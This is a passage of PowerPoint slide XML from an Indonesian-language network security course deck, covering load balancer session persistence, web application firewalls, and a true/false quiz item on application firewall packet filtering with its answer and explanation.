            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada node yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persistensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> agar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Persistensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disuntikkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>afinitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cookie.</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113</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6415254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Firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> web (WAF)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di server web dan basis data back-end </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>injeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penolakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. WAF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sadar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memfilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. WAF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diprogram</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencocokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memblokir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencurigakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WAF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dituliskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> log, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengungkapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>WAF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditempatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> plug-in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform server web.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>114</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372130025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1. True or False? As they protect data at the highest layer of the protocol stack, application-based firewalls have no basic packet filtering functionality.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>False.</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dirty="0"/>
              <a:t>Application firewalls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Layer 7 (application layer)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inspeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> filter HTTP, SQL injection, XSS).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>basic packet filtering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (Layer 3/4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menolak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jadi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
